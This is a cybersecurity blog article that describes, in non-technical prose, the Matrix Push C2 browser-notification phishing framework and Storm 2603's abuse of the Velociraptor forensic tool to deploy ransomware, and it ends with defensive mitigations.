The New Front Lines: Fileless Attacks via Browser Notifications & Weaponized Security Tools

By Imthiyaz Ali
The New Front Lines: Fileless Attacks via Browser Notifications & Weaponized Security Tools

The cybersecurity landscape is experiencing a tactical shift as modern threat actors move away from traditional malware-based attacks and adopt more covert and adaptive techniques. Two major campaigns are drawing significant attention from researchers worldwide. The first involves Matrix Push C2, a cross-platform fileless phishing framework that weaponizes browser notification systems. The second highlights the misuse of the legitimate forensic tool Velociraptor by the advanced threat actor Storm 2603 to conduct reconnaissance and deploy ransomware inside victim environments.

Part 1: Matrix Push C2 and the Rise of Fileless Browser Exploitation

Matrix Push C2 is a newly identified platform that represents a major evolution in phishing and social engineering. Instead of relying on malicious downloads or script injections, attackers are using the browser's native push notification capability to create a persistent Command and Control channel that works across multiple operating systems.

The Cross-Platform Fileless Approach

  • Initial Access: Victims are manipulated into granting notification access to a malicious or compromised website. These sites often display deceptive prompts such as verification checks that trick users into clicking the Allow button.
  • Persistent C2 Channel: Once permission is granted, the attacker can send continuous push notifications directly to the victim's desktop or mobile device. This channel remains active across Windows, macOS, Linux and Android without the need for any installed malware.
  • Stealth and Social Engineering: The notifications imitate trusted system alerts or brand messages, including fake browser updates or warnings from services such as MetaMask, PayPal and Netflix. Because the channel is native to the browser, traditional endpoint defenses struggle to detect or block the activity.
  • Malware-as-a-Service Model: Matrix Push C2 is sold on cybercriminal marketplaces as a subscription service. Buyers gain access to a dashboard that allows them to craft notification templates, manage campaigns and monitor victim engagement.

This technique has created a new class of phishing attacks that remain active even after a user leaves the initial compromised site. It also blurs the line between legitimate browser behavior and malicious activity, making it much more challenging to identify and contain.

Part 2: Storm 2603 Weaponizes Velociraptor for Covert Ransomware Operations

A second major trend involves the exploitation of trusted security tools to blend malicious activity seamlessly into normal network operations. Storm 2603, a sophisticated threat actor believed to have ties to China, has been misusing the digital forensic tool Velociraptor as part of a long running intrusion campaign.

Threat Actor and Operational Overview

Threat Actor Tool Misused Objective
Storm 2603 Velociraptor (Digital Forensic and Incident Response tool) Reconnaissance, credential harvesting and ransomware deployment

The Attack Chain: Turning Defense Tools Into Offensive Assets

  1. Initial Breach: Storm 2603 often enters networks through exploitation of high severity vulnerabilities, including previously abused flaws in Microsoft SharePoint.
  2. Weaponized Deployment: After gaining access, the attackers deploy an outdated and modified Velociraptor client configured to communicate with their own external servers. The altered client bypasses the victim’s legitimate Velociraptor infrastructure and establishes an attacker-controlled command channel.
  3. Stealth and Reconnaissance: The group uses Velociraptor's built-in capabilities to collect system information, harvest credentials, disable endpoint protections and move laterally across both Windows hosts and VMware ESXi environments. Because the tool is legitimate and often whitelisted, these actions produce very few alerts.
  4. Final Payload: Once reconnaissance is complete, Storm 2603 delivers multiple ransomware families, including LockBit, Babuk and Warlock, to maximize the operational and financial impact on the victim.

The misuse of Velociraptor presents a significant detection challenge. Network activity and host-level events appear to originate from a trusted and often essential security tool, which allows attackers to remain hidden for long periods.

Mitigation: Strengthening Defense Strategies for Modern Threats

These emerging campaigns show that modern defenses must shift from signature-based detection to behavioral monitoring, real-time analysis of legitimate tool usage and strict control over browser and application permissions.

1. Mitigating Matrix Push C2 Attacks

  • User Awareness: Train users to decline unexpected notification requests and understand the risks behind seemingly harmless browser prompts.
  • Browser Permission Management: Encourage regular audits of notification permissions and require revocation of unused or untrusted access.
  • Outbound Traffic Inspection: Monitor and restrict unusual traffic originating from browser processes to unknown push service domains.

2. Mitigating Storm 2603’s Abuse of Velociraptor

  • Binary Verification: Alert on the execution of Velociraptor binaries that are unsigned or modified, as the official versions are signed by the vendor.
  • Strict Egress Control: Limit Velociraptor's network communication strictly to the organization’s internal Velociraptor servers.
  • Patch and Validate: Ensure that both DFIR tools and administrative utilities are updated promptly to prevent exploitation of known vulnerabilities.

The contemporary threat landscape demands constant vigilance and a deep understanding of how legitimate technologies can be repurposed for malicious use. Attackers are increasingly blending into normal operations by exploiting trusted tools and built-in platform features. Defending against these threats requires strong behavioral monitoring, strict access policies and an assumption that even approved tools may be weaponized if not closely supervised.

Imthiyaz Ali
Imthiyaz Ali
Imtiyaz is an experienced Cybersecurity Professional with over 5 years of experience in Cybersecurity Research.